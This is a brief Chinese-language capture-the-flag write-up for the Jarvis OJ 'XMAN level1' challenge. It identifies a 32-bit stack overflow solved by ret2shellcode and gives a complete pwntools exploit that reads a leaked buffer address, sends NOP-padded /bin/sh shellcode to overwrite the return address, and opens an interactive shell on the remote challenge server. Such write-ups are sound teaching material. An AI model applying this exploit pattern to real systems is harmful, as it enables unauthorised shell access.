[XMAN]level1

nc pwn2.jarvisoj.com 9877

 

 

level1.80eacdcd51aca92af7749d96efad7fb5

 

32位栈溢出，ret2shellcode

exp如下：

from pwn import *

#io = process('./level1')
io = remote('pwn2.jarvisoj.com', 9877)

context.arch = 'i386'
context.os = 'linux'

shellcode = asm(shellcraft.sh())

io.recvuntil("What's this:")
buf_addr = int(io.recvuntil('?', drop = True), 16)
info("buf_addr:" + str(hex(buf_addr)))
payload = shellcode.ljust(140, b'\x90')
payload += p32(buf_addr)
io.send(payload)

io.interactive()